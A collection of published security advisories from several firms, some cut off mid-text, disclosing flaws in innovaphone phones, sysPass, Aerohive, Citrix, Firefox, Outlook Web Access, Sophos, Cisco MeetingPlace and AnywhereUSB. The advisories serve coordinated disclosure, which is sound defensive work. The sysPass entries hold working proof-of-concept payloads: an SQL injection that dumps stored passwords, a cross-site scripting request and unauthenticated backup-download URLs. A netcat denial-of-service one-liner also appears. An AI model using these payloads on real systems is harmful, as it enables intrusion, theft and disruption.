[SYSS-2015-053] innovaphone IP222/IP232 - Denial of Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2015-053 Product: innovaphone IP222/IP232 Manufacturer: innovaphone AG Affected Version(s): 11r1s r2 Tested Version(s): 11r1s r2 Vulnerability Type: Denial of Service (CWE-730) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2015-09-02 Solution Date: unknown Public Disclosure: 2016-03-04 CVE Reference: Not yet assigned Author of Advisory: Alexander Brachmann (SySS GmbH) Overview: The innovaphone IP222 and IP232 are IP telephones with many features. The manufacturer innovaphone describes the products as follows (see [1], [2]): "The IP222 telephone unites a very modern design with groundbreaking technological details. It belongs to the innovaphone product family that won the popular "red dot award: product design". (...) The innovaphone IP232 IP phone unites a very modern design with groundbreaking technological details. It belongs to the innovaphone design telephone product range that won the coveted "red dot award: product design"." Due to a vulnerability in the H.323 network service on the TCP port 1720, the telephone can be restarted in an unauthorized manner by an attacker causing a denial-of-service condition. Vulnerability Details: A not further analyzed vulnerability in the H.323 network service on the TCP port 1720 of the IP telephone IP222 can be exploited by an attacker on the same network to reboot the telephone in an unauthorized way. This vulnerability can be used for denial-of-service attacks against the IP222 telephone at arbitrary states, for example during a call. If the IP222 telephone is configured in such a way that its users are not automatically logged in after a reboot, the impact of this denial-of-service attack is even bigger as user interaction is required to restore the IP telephone to the previous working state. Proof of Concept (PoC): The IP telephone IP222 can be rebooted in an unauthorized way by sending random data to its H.323 network service on the TCP port 1720, for example by using the following command: $ cat /dev/urandom | nc 1720 Before rebooting, the CPU register state is shown on the telephone's display (white text on red background). Solution: According to test results of the SySS GmbH with a newer firmware version 11r2 sr9, the reported security issue was fixed by the manufacturer. Please contact the manufacturer for further information or support. ~~~~~~~~ Disclosure Timeline: 2015-09-04: Vulnerability reported to manufacturer 2015-09-07: Manufacturer acknowledges e-mail with SySS security advisory and asks for further information 2015-09-08: Response to open question 2015-11-06: E-mail to manufacturer asking about the current state of the reported security issue 2015-11-06: Manufacturer cannot reproduce the security issue Providing detailled information how the security vulnerability can be triggered 2015-11-09: E-mail to manufacturer asking about the current state of the reported security issue 2015-11-12: Further e-mail to manufacturer asking about the current state of the reported security issue 2016-03-03: Test of the security vulnerability with the newer firmware version 11r2 sr9 where no DoS condition could be triggered anymore 2016-03-04: Public release of security advisory References: [1] innovaphone IP222 product Web site http://www.innovaphone.com/en/ip-telephony/ip-phones/ip222.html [2] innovaphone IP232 product Web site http://www.innovaphone.com/en/ip-telephony/ip-phones/ip232.html [3] SySS Security Advisory SYSS-2015-053 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-053.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ Credits: This security vulnerability was found by Alexander Brachmann of the SySS GmbH. E-Mail: alexander.brachmann (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Alexander_Brachmann.asc Key fingerprint = 8E49 74AF 34A6 E600 E958 FB63 2E8E 1546 17DE CFFE Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as p
[SYSS-2015-047] sysPass - Cross-Site Scripting (CWE-79)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2015-047 Product: sysPass Vendor: http://cygnux.org/ Affected Version(s): 1.1.2.23 and below Tested Version(s): 1.1.2.23 Vulnerability Type: Cross-Site Scripting (CWE-79) Risk Level: Medium Solution Status: Fixed Vendor Notification: 2015-07-14 Solution Date: 2015-10-26 Public Disclosure: 2015-12-07 CVE Reference: Not yet assigned Author of Advisory: Daniele Salaris (SySS GmbH) Overview: sysPass is an web based Password Manager written in PHP and Ajax with a built-in multiuser environment. The functionality "Account Details" is prone to a reflected cross-site scripting vulnerability. The software manufacturer describes the web application as follows (see [1]): "sysPass is a web password manager written in PHP that allows the password management in a centralized way and in a multiuser environment. The main features are: * HTML5 and Ajax based interface * Password encryption with AES-256 CBC. * Users and groups management. * Advanced profiles management with 16 access levels. * MySQL, OpenLDAP and Active Directory authentication. * Activity alerts by email. * Accounts change history. * Accounts files management. * Inline image preview. * Multilanguage. * Links to external Wiki. * Portable backup. * Action tracking and event log. * One-step install process." Vulnerability Details: The PHP script ajax_getContent.php of the web application functionality "Account Details" is vulnerable to reflected cross-site scripting via the parameter "lastAction". The web application sysPass inserts the injected code into the "back" button of the result web page where it can be triggered. This reflected cross-site scripting vulnerability can be exploited in the context of an authenticated user by sending a specially crafted HTTP POST request (see PoC section). Proof of Concept (PoC): The following HTTP POST request using the JavaScript code "'-alert(1)-'" as the value for the parameter "lastAction" demonstrates the reflected cross-site scripting vulnerability by showing a JavaScript alert box after the "back" button was clicked: POST /sysPass/ajax/ajax_getContent.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/sysPass/index.php Content-Length: 74 Cookie: PHPSESSID= Connection: keep-alive Pragma: no-cache Cache-Control: no-cache action=accview&lastAction=accsearch'-alert(1)-'&id=1&isAjax=1 The server answers as follows: HTTP/1.1 200 OK (...) (...) Solution: The reported security vulnerability has been fixed in a new software release. Update to the new software version. Disclosure Timeline: 2015-07-14: Vulnerability discovered 2015-07-14: Vulnerability reported to vendor 2015-10-26: Release of new software version that addresses the reported security issue. 2015-12-07: Public release of security advisory References: [1] Web site of sysPass - sysadmin password manager http://wiki.syspass.org/en/start [2] SySS Security Advisory SYSS-2015-047 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-047.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~ Credits: This security vulnerability was found by Daniele Salaris of the SySS GmbH. E-Mail: disclosure (at) syss.de Key fingerprint = E135 4E23 6091 A85C 9E14 577A 28DF B3A7 0A98 A9D4 Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -BEGIN PGP SIGNATURE- iQIcBAEBCgAGBQJWZTi3AAoJECjfs6cKmKnUUW0P/2AkQ/8y7xiv3I+LVSyb8STZ XPVGYCBoqaTO2aQUeaMlE5pOYS0NzSsogFJuVk61D/GI6zI0IxJp22U0Myu9
[SYSS-2015-046] sysPass - Insecure Direct Object References (CWE-932)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2015-046 Product: sysPass Manufacturer: http://cygnux.org/ Affected Version(s): 1.0.9 and below Tested Version(s): 1.0.9 Vulnerability Type: Insecure Direct Object References (CWE-932) Exposure of Backup File to an Unauthorized Control Sphere (CWE-530) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2015-06-10 Solution Date: 2015-10-26 Public Disclosure: 2015-12-07 CVE Reference: Not yet assigned Author of Advisory: Daniele Salaris (SySS GmbH) Overview: sysPass is an web-based Password Manager written in PHP and Ajax with a built-in multiuser environment. The web application is prone to a security vulnerability that allows an unauthorized attacker to download existing backup files containing sensitive data. The software manufacturer describes the web application as follows (see [1]): "sysPass is a web password manager written in PHP that allows the password management in a centralized way and in a multiuser environment. The main features are: * HTML5 and Ajax based interface * Password encryption with AES-256 CBC. * Users and groups management. * Advanced profiles management with 16 access levels. * MySQL, OpenLDAP and Active Directory authentication. * Activity alerts by email. * Accounts change history. * Accounts files management. * Inline image preview. * Multilanguage. * Links to external Wiki. * Portable backup. * Action tracking and event log. * One-step install process." Vulnerability Details: The backup functionality of the web-based password manager sysPass creates the following two backup files that are stored within the application's backup folder: * sysPass_db.sql * sysPass.tar.gz The file sysPass_db.sql contains a full database dump and the file sysPass.tar.gz contains all contents of the sysPass web application folder. An unauthorized attacker can simply download these two existing backup files via the following URLs: http(s):///backup/sysPass_db.sql http(s):///backup/sysPass.tar.gz Thus, an external attacker without valid user credentials can gain unauthorized access to all configuration and application data of the password manager sysPass. With access to this data, an attacker can perform further attacks in order to recover user credentials of sysPass users or to decrypt encrypted password information contained within the database. Proof of Concept (PoC): The following URLs can be used to download existing backup files of the password manager sysPass from an external attacker's perspective: http(s):///backup/sysPass_db.sql http(s):///backup/sysPass.tar.gz For example: http://syspass.org/demo/backup/sysPass_db.sql http://syspass.org/demo/backup/sysPass.tar.gz Solution: The reported security vulnerabilities have been fixed in a new software release. Update to the new software version. ~~~~ Disclosure Timeline: 2015-06-08: Vulnerability discovered 2015-06-10: Vulnerability reported to manufacturer 2015-10-26: Release of new software version that addresses the reported security issues. Discussed security fix with manufacturer. 2015-12-07: Public release of security advisory References: [1] Web site of sysPass - sysadmin password manager http://wiki.syspass.org/en/start [2] SySS Security Advisory SYSS-2015-046 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-046.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ Credits: This security vulnerability was found by Daniele Salaris of the SySS GmbH. E-Mail: disclosure (at) syss.de Key fingerprint = E135 4E23 6091 A85C 9E14 577A 28DF B3A7 0A98 A9D4 Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -BEGIN PGP SIGNATURE- iQIcBAEBCgAGBQJWZTiTAAoJECjfs6cKmKnUhucP/3VqXYMAvJtSbbbHwsZyh0Td T9LtezrGtZeZze4CAMcfJvUZO9/wiDbdDsaEAV2UXrYDvA8f9rXJle
[SYSS-2015-031] sysPass - SQL Injection
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2015-031 Product: sysPass Vendor: http://cygnux.org/ Affected Version(s): 1.0.9 and below Tested Version(s): 1.0.9 Vulnerability Type: SQL Injection (CWE-89) Risk Level: High Solution Status: Fixed Vendor Notification: 2014-07-27 Solution Date: 2014-08-04 Public Disclosure: 2015-07-13 CVE Reference: Not yet assigned Author of Advisory: Daniele Salaris (SySS GmbH) Overview: sysPass is an web based Password Manager written in PHP and Ajax with a built-in multiuser environment. An SQL injection vulnerability could be identified in one of the requests of this web password manager. The software manufacturer describes the web application as follows (see [1]): "sysPass is a web password manager written in PHP that allows the password management in a centralized way and in a multiuser environment. The main features are: * HTML5 and Ajax based interface * Password encryption with AES-256 CBC. * Users and groups management. * Advanced profiles management with 16 access levels. * MySQL, OpenLDAP and Active Directory authentication. * Activity alerts by email. * Accounts change history. * Accounts files management. * Inline image preview. * Multilanguage. * Links to external Wiki. * Portable backup. * Action tracking and event log. * One-step install process." Vulnerability Details: The SQL injection vulnerability was found in an HTTP post request of the AJAX component from the sysPass software. The attribute getAccounts is not correctly sanitized and therefore can be abused to inject arbitrary SQL statements. This SQL injection vulnerability can be exploited by an authenticated attacker by sending a specially crafted HTTP POST request (see PoC section). Proof of Concept (PoC): The following HTTP request can be used to extract information from the database: POST /sysPass-1.0.9/ajax/ajax_search.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http:///sysPass-1.0.9/index.php Content-Length: 249 Cookie: PHPSESSID= Connection: keep-alive Pragma: no-cache Cache-Control: no-cache search=getAccounts') UNION ALL SELECT NULL,NULL,account_name,account_login,account_pass,account_url,NULL,NULL,NULL,NULL,NULL from accounts -- &start=0&skey=1&sorder=1&sk=081bad3198bdb3cd29133befc57d60287541663b&is_ajax=1&customer=0&category=0&rpp=10 The server answers as followed: HTTP/1.1 200 OK Date: Fri, 10 Jul 2015 14:06:04 GMT Server: Apache/2.4.12 (Unix) PHP/5.6.10 X-Powered-By: PHP/5.6.10 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=; path=/; HttpOnly Content-Length: 1147 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 CustomerNameCategoryUserURL / IPTEST_USERTEST_NAMETEST_URL1 @ 0.00478 s Filter ON 1 / 1 Solution: Update sysPass to the latest software version. ~~~~~~~~ Disclosure Timeline: 2014-07-27: Vulnerability discovered 2014-07-27: Vulnerability reported to vendor 2014-08-04: Vendor releases new fixed version of sysPass 2015-07-13: Public release of security advisory References: [1] Web site of sysPass - sysadmin password manager http://wiki.syspass.org/en/start [2] SySS Security Advisory SYSS-2015-031 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-031.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ Credits: This security vulnerability was found by Daniele Salaris of the SySS GmbH. E-Mail: disclosure (at) syss.de Key fingerprint = E135 4E23 6091 A85C 9E14 577A 28DF B3A7 0A98 A9D4 Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. Copyright: Creative Commons - Attribution (by) - Ve
Aerohive Hive Manager and Hive OS Multiple Vulnerabilities
(, ) (, . '.' ) ('.', ). , ('. ( ) ( (_,) .'), ) _ _, / _/ / _ \ _ \ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ |\\ \__( <_> ) Y Y \ /__ /\___|__ / \___ >/|__|_| / \/ \/.-.\/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. Aerohive Hive Manager and Hive OS Multiple Vulnerabilities Affected Versions: Aerohive Hive Manager (Stand-alone and Cloud) >= 6.1R3 and HiveOS 6.1R3 PDF: http://www.security-assessment.com/files/documents/advisory/Aerohive%20Hive%20Manager%20and%20Hive%20OS%20Multiple%20Vulnerabilities.pdf +-+ | Description | +-+ This document details multiple vulnerabilities found within the Aerohive Hive Manager and HiveOS software. These vulnerabilities have been disclosed to the vendor on or before the 24th of April 2014. -- Hive Manager Arbitrary File Disclosure -- Leveraging directory traversal, a malicious user can retrieve arbitrary files from the Hive Manager file system. As the Tomcat instance serving the Hive Manager software runs as the root user, this vulnerability can be used to read any file off the file system, including sensitive files such as /etc/shadow. -- Hive Manager Arbitrary File Upload -- An authenticated malicious user may send a crafted post to the ‘upload’ servlet and upload arbitrary files. As the upload servlet is protected by HTTP basic authentication, this requires the knowledge of the scpuser’s password. -- Hive Manager Debugserver Code Execution -- It was discovered that an authenticated user may send a crafted request to the Hive Manager ‘debugserver’ servlet and execute arbitrary commands on the Hive Manager server. -- Hive Manager Multiple Password Disclosure -- Multiple methods within the Hive Manager web interface were found to expose sensitive information such as usernames and passwords. A malicious entity may leverage these disclosures to further compromise the Hive Manager. -- Hive Manager Reflected Cross Site Scripting -- Multiple Reflected Cross Site Scripting vulnerabilities were found within the Hive Manager software. These vulnerabilities allow a malicious entity to potentially gain JavaScript execution within a legitimate user’s browser. This is done with the aim of harming the user’s browser or hijacking their session. -- Hive Manager SSH Keys Lacking Passphrase -- An SSH key was found on the Hive Manager file system without any passphrase set. This allows a malicious user with access to the file system to gain unauthorised access to the system with root user privileges. -- Hive Manager Subshell Bypass -- By using a crafted SSH command, a malicious user may gain root access to the Hive Manager with a fully functional bash terminal, effectively bypassing the Aerohive subshell. This allows the malicious user to perform tasks on the underlying CentOS Linux operating system, including the retrieval of private keys, passwords and other sensitive information -- Hive Manager Unauthenticated Arbitrary File Upload -- The Hive Manager HHMUploadServlet was found to suffer from an Unauthenticated Arbitrary File Upload vulnerability. By sending a crafted packet to the servlet, a malicious entity is able to gain arbitrary code execution on the Hive Manager server. -- HiveOS Local File Inclusion -- Aerohive HiveOS was found to contain a Local File Inclusion Vulnerability within the web administrative interface. The Local File Inclusion allows a malicious entity to control what files are included by the vulnerable PHP page. In the event that the malicious entity is able to control an element on the file system, this results in arbitrary code execution. As user controlled information is present within the log-files of the application, this is easily achievable. -- HiveOS Password Disclosure -- Log files within the HiveOS operating system were found to disclose sensitive information such as usernames and password. A malicious user may leverage this information to further compromise the Aerohive deployment or its users. -- HiveOS Unauthenticated Firmware Upload -- Insufficient authorisation checking was found to be being performed on certain firmware upload functions. This allows for the upload of a backdoored or otherwise malicious firmware by an attacker. +--+ | Exploitation | +--+ Detailed exploitation information and code will be released in December 2014. ++ | Workaround | ++ Update to the latest version of Hive Manager and HiveOS software including the cloud solutions. ++ | Credit | ++ Denis Andzakovic, Scott Bell, Nick Freeman, Thomas Hibbert, Carl Purvis, Pedro Worcel. +-+ |About Security-Assessment.com| +-
Heap Offset Overflow in Citrix ICA Clients
===ADVISORY=== Systems Affected:Citrix ICA Client Severity:High Category:Heap Offset Overflow Author: Context Information Security Ltd Reported to vendor: 20th February 2008 Advisory Issued: 4th August 2010 ===ADVISORY=== Description --- The Citrix Presentation Server Client (test on v10.150) does not perform bounds checking on the type field in an ICA "graphics" packet. This lack of checking allows for a remote exploitation of a user that has the client installed. The exploit can be triggered by sending a user to a malicious webpage that causes an ICA file to be downloaded. This automatically connects to a simulated ICA server, which can trigger the remote code execution and take control over the client. Analysis The ICA client software is vulnerable to an offset overflow heap exploit. The ICA client does not correctly validate input from network data in the graphics packets. This allows arbitrary code execution on a victim's computer that connects to a malicious ICA server. A user with the ICA client installed will automatically connect to an ICA server that is provided via a URL. Therefore if a user clicks on a malicious link, opens an ".ICA" file via email or is redirected to a malicious server the exploit will be launched against the user. The exploit works by providing an ".ICA" file to the web browser which instructs the browser to load the ICA client and connect to the malicious server. The server is not a real ICA server but software which simulates the initially negotiation of an ICA connection and then launches the exploit. Technologies Affected - Citrix Client 10 for Windows, Mac, Linux, Solaris and Windows Mobile Vendor Response --- Citrix advise users to upgrade to the latest version of the Citrix client. See the following Citrix support article for more details: http://support.citrix.com/article/CTX125975 Disclosure Timeline --- 20th February 2008 - Vendor Notification 26th February 2008 - Vendor Response for more Details 3rd March 2008 - Vendor Confirm Vulnerability 3rd August 2010 - Vendor Patch Released Credits Michael Jordon of Context Information Security Ltd About Context Information Security -- Context Information Security is an independent security consultancy specialising in both technical security and information assurance services The company was founded in 1998. Its client base has grown steadily over the years, thanks in large part to personal recommendations from existing clients who value us as business partners. We believe our success is based on the value our clients place on our product-agnostic, holistic approach; the way we work closely with them to develop a tailored service; and to the independence, integrity and technical skills of our consultants. The company's client base now includes some of the most prestigious blue chip companies in the world, as well as government organisations. The best security experts need to bring a broad portfolio of skills to the job, so Context has always sought to recruit staff with extensive business experience as well as technical expertise. Our aim is to provide effective and practical solutions, advice and support: when we report back to clients we always communicate our findings and recommendations in plain terms at a business level as well as in the form of an in-depth technical report. Web:www.contextis.co.uk Email: disclos...@contextis.co.uk
Context IS Advisory - Autocomplete Data Theft in Mozilla Firefox
===ADVISORY=== Name: Autocomplete Data Theft in Mozilla Firefox Systems Affected: Mozilla Firefox 3.5, Mozilla Firefox 3.0 Severity: Moderate Category: Data Leakage Author: Context Information Security Ltd Advisory: 4 November 2009 CVE: CVE-2009-3370 ===ADVISORY=== Description: A malicious web page can extract out all the data stored within the autocomplete history of a user's Firefox browser. The web page must convince a user to hold down the left or right-arrow keys then the contents of the autocomplete popup can be read. This may includes the search history box within the browser, or other personal details. Analysis A malicious web page can be created that includes a text field with the same 'name' attribute as data entered on other sites (e.g 'q' for Google). The form autocompletion popup in Firefox can then be triggered and manipulated by a variety of key presses. For example, by pressing the 'a' key, autocomplete entries starting with that letter will be shown. Entries in the poupup can be selected by using the up/ down arrow keys. When the left or right arrow key is pressed, the currently selected entry from the popup is entered into the text field and can be read through JavaScript. In Firefox, a web page can use the 'createEvent' and 'initKeyEvent' JavaScript methods to create synthetic key events. It was discovered that these events could be used to trigger an autocomplete popup and change the currently selected entry in the popup. However, it was not possible for synthetic events to cause the text field to be filled with the current entry. Therefore some user interaction is required to enable the web page to steal the contents of the drop-down. If a web page can convince a user to hold down or repeatedly press the left or right-arrow keys, it can systematically grab each entry in the drop-down box. Technologies Affected - Mozilla Firefox 3.5.3 and below Mozilla Firefox 3.0.0.14 and below Resolution -- Mozilla fixed this issue in the 3.5.4 and 3.0.0.15 releases of Firefox: http://www.mozilla.org/security/announce/2009/mfsa2009-52.html CVE --- This issue has been assigned CVE number CVE-2009-3370. Disclosure Timeline --- 8th August 2009 - Initial Discovery and Vendor Notification 8th August 2009 - Vendor Response 27 October 2009 - Vendor Advisory Release 4 November 2009 - Context Information Security Advisory Release Credits --- Paul Stone of Context Information Security Ltd About Context Information Security -- Context Information Security Limited is a specialist information security consultancy based in London and Dusseldorf. Context promotes the holistic approach to information security and helps clients to identify, assess and control their exposure to risk within the fields of IT, telephony and physical security. Context employs experienced information security professionals who are subject-matter experts in their various technical specialisms. Context works extensively within the finance, legal, defence and government sectors, delivering high-end information security projects to organisations for which security is a priority. Web:www.contextis.co.uk Email: disclos...@contextis.co.uk
Context IS Advisory - MS08-39 OWA XSS
===ADVISORY=== Systems Affected:Microsoft Outlook Web Access 2003 and 2007 (Exchange Server 2003 SP2, Exchange Server 2007, Exchange Server 2007 SP1) Severity:High Category:Cross Site Scripting, Cross Site Request Forgery Author: Context Information Security Ltd Reported to vendor: 10th January 2008 Advisory Issued: 10th July 2008 ===ADVISORY=== Description --- Several Cross Site Scripting vulnerabilities were found in within Outlook Web Access (OWA) 2003/2007. An attacker can craft a malicious email which will trigger within a user's browser. Different version of OWA and different clients (Light and Premium) have different attack vectors which can result in an attacker gaining *persistent* control over a victim's use of Outlook Web Access. An attacker would have full control and access to the victims e-mail account. This control could be further abused by utilising techniques such as JavaScript root-kits or web worms. Analysis An attacker can craft a malicious email which contains the attack strings to compromise an OWA client. The user would only need to view the email to be victim to the XSS attack. Furthermore, persistent XSS can be gained by changing certain values within OWA to a particular XSS attack string. This string (consisting of HTML/JavaScript) is subsequently injected into *any* page which uses this value, including "new email", "reply email" (for OWA 2003) and most pages (for OWA 2007). Logging out of the application and back in will not clear the attack. Furthermore, the attack can be propagated by using the control over the OWA client to email the attack link to all users in the victim's inbox/contacts. At this point the attack would spread as a XSS worm (albeit one requiring the user to view the incoming email). This could potentially affect all users of the OWA application. Technologies Affected - Microsoft Exchange Server 2003 Microsoft Exchange Server 2007 Microsoft Exchange Server 2007 SP1 Vendor Response --- On 9th July 2008, Microsoft issued a security bulletin MS08-039 and an associated patch for Exchange Server 2003 and Exchange Server 2007 SP1 Patches are available from: http://www.microsoft.com/technet/security/bulletin/ms08-039.mspx Context would recommend that these patches be installed as soon as practical to all Exchange Servers providing OWA functionality. CVE --- This issue has been assigned CVE numbers CVE-2008-2247 and CVE-2008-2248. Disclosure Timeline --- 10 January 2008 - Initial Discovery and vendor notification. 14th January 2008 - Vendor response requesting further details. 14th March 2008 - Vendor response requesting PoC. PoC provided. 9th July 2008 - Vendor advisory release. 10th July 2008 - Context Information Security Ltd advisory release. Credits Michael Jordon of Context Information Security Ltd About Context Information Security -- Context Information Security Limited is a specialist information security consultancy based in London and Frankfurt. Context promotes the holistic approach to information security and helps clients to identify, assess and control their exposure to risk within the fields of IT, telephony and physical security. Context employs experienced information security professionals who are subject-matter experts in their various technical specialism's. Context works extensively within the finance, legal, defence and government sectors, delivering high-end information security projects to organisations for which security is a priority. Web:www.contextis.co.uk Email: [EMAIL PROTECTED]
Sophos Anti-Virus 6.5.4 Vulnerability
NameCross Site Scripting Vulnerability in Sophos Anti-Virus Systems AffectedSophos Anti-Virus, version 6.5.4 R2 SeverityMedium CategoryCross Site Scripting Author Context Information Security Ltd Advisory6th September 2007 Description --- A ZIP archive containing a virus signature with a malformed file name will cause a Cross Site Scripting vulnerability to be triggered from within the Sophos Anti Virus client. Analysis When Sophos anti-virus scans a specially crafted ZIP archive containing a XSS attack string, it will internally log the string. When this information is accessed via the Sophos client (SavMain.exe) the XSS attack string is unencoded. When the print function is called, the application can be used to run arbitrary code on the target machine from an external attackers submitted file. Technologies Affected - Sophos Anti-Virus, version 6.5.4 R2 Resolution -- Update to version 6.5.8 or 7.0. Vendor Response --- Sophos have patched this issue in version 7.01. CVE Details --- This issue has been provisionally assigned a CVE candidate number of CVE-2007-4512 Disclosure Timeline --- 18 April 2007 Initial Discovery and vendor notification 19 April 2007 Vendor Response 21 August 2007 Second Vendor Response 6 September 2007 - Coordinated Public Release Credits Michael Jordon of Context Information Security Ltd About Context Information Security -- Context Information Security Limited is a specialist information security consultancy based in London and Frankfurt. Context promotes the holistic approach to information security and helps clients to identify, assess and control their exposure to risk within the fields of IT, telephony and physical security. Context employs experienced information security professionals who are subject-matter experts in their various technical specialisms. Context works extensively within the finance, legal, defence and government sectors, delivering high-end information security projects to organisations for which security is a priority. Web:www.contextis.co.uk Email: [EMAIL PROTECTED] About Sophos "Sophos is a world leader in IT security and control solutions purpose-built for business, education, government organizations and service providers. Our reliably engineered, easy-to-operate products protect over 100 million users in more than 150 countries from viruses, spyware, adware, Trojans, intrusion, spam, policy abuse, and uncontrolled network access."
XSS vulnerability in Cisco MeetingPlace
SecureTest Ltd (www.securetest.com) Security Advisory XSS vulnerability in Cisco MeetingPlace Date: 18th July 2007 Author: Roger Jefferiss Application: Cisco MeetingPlace Risk: Medium Vendor Status: Replicated and verified by Cisco Systems, patch available. Reference: http://www.cisco.com Overview: There exists a cross site scripting issue in Cisco MeetingPlace Application. The result of this is that when a specially crafted web page with a hidden arbitrary code could be executed on the host accessing the application. Details: Cisco Meetingplace provides a web based application for online meetings. It was discovered that a specially crafted script could be executed on certain parameters with in Meetingplace application. The result is script code execution in the local user context in the host. Preliminary tests concluded the system is vulnerable with most popular web browsers such as Microsoft Internet Explorer 7.0 and Mozilla Firefox 2.0 fully patched. User intervention (e.g. clicking on a malicious link) is necessary to trigger the exploit. Affected Versions: This vulnerability has been confirmed in the following versions: - 4.3.0.246 - 4.3.0.246.5 - 5.3.104.0 - 5.3.104.3 The following versions have been tested and are unaffected due to the fact they return an xml template: - 5.3.333.0 - 5.3.447 - 5.3.447.4 - 5.4.70.0 - 6.0.170.0 Vendor Response: Cisco bug ID: CSCsi33940 The above vulnerability was addressed by Cisco Systems recommending that you update grade to Version 5.3.333.0 or higher Please see http://www.cisco.com/warp/public/707/cisco-sr-20070808-mp.shtml for details. SecureTest for all your PCI requirements- PCI workshops, PCI Scoping, Assistance with Self Assessment questionnaires, Gap Analysis, ASV Scanning, PCI-DSS Audits - SecureTest are an accredited PCI ASV & QSA company. Contact SecureTest now to discuss your requirements in more detail on 01844 210310 or e-mail us [EMAIL PROTECTED] SecureTest Ltd is a company registered in England and Wales with company number 4474600 Our VAT number is 793 8555 69
AnywhereUSB/5 1.80.00 Drivers Integer Overflow
AnywhereUSB/5 1.80.00 Drivers Integer Overflow Risk: low. This advisory can be found here: http://www.safend.com/advisories/digi_anywhereusb5_intoverflow.txt I. BACKGROUND AnywhereUSB/5 provides five USB ports, which deliver the same Plug and Play user experience as onboard USB ports. Software drivers are loaded onto a host PC or server, enabling remote devices to communicate with the host, without changing existing application software. Peripheral devices can be centrally managed and monitored from a remote server or PC via an IP address. http://www.digi.com/products/usb/anywhereusb.jsp II. DESCRIPTION This low-risk vulnerability in AnywhereUSB/5 1.80.00 allows an attacker to forge an AnywhereUSB server, so that if a client connects to it, it can be hit with a denial of service attack. This integer overflow in version 1.80.00 of AnywhereUSB/5 drivers package distributed for Windows NT 4.0/2000/XP and 2003. could allow attackers to Bugcheck (BSOD) currently connected clients on demand, or any new client upon connection. The problem exists within the parsing of USB string descriptors. A malformed string descriptor that in its header specifies a size of 1 byte, will cause a memory copy loop to go behind allocated memory range. This will result in a Bugcheck (BSOD) within the client computer driver. III. ANALYSIS Successful exploitation allows an attacker to crash the client computer and cause a Bugcheck (BSOD) on demand. Exploitation is possible in two ways: by sending a specially crafted string descriptor to the client or by attaching a maliciously crafted USB device to the hub. IV. DETECTION Safend has confirmed that AnywhereUSB/5 drivers version 1.80.00 is vulnerable. It is suspected that earlier versions of AnywhereUSB/5 may also vulnerable. V. WORKAROUND Avoid plugging unknown USB devices into an AnywhereUSB/5 hub. Apply strict firewalls rules, to prevent clients from connecting to a malicious AnywhereUSB/5 server, which could in turn send the malformed string descriptor to the client via TCP/IP. VI. VENDOR RESPONSE SecuriTeam was asked to assist the researchers with contacting Digi International. Reported to vendor: 24th of July, 2006. Vendor response: 25th of July, 2006. Vendor's official response: "The AnywhereUSB product is used with commercial USB peripheral devices on dedicated point to point IP connections, almost always on non-public local area networks. The likelihood of any such USB device producing a USB descriptor corrupted in precisely this way is extremely unlikely. This error will be corrected in a future driver release." VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-4459 to this issue. VIII. CREDIT This vulnerability was discovered by Itzik Kotler, Safend. IX. About SecuriTeam's Assisted Disclosure Many researchers do not have the time, energy or inclination to deal with reporting a vulnerability to vendors. SecuriTeam is here to help. If you want us to handle the logistics of contacting and following up with the vendor, making sure the problem is fixed, contact: [EMAIL PROTECTED] Our end goal is Full Disclosure, preferably in coordination with the vendor, without exposing the researcher to unnecessary risk. We do not believe in hiding or selling vulnerabilities. Never had, never will. All credit will be properly attributed. If asked we can act as proxies, keeping your privacy and anonymity. X. LEGAL NOTICES Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. 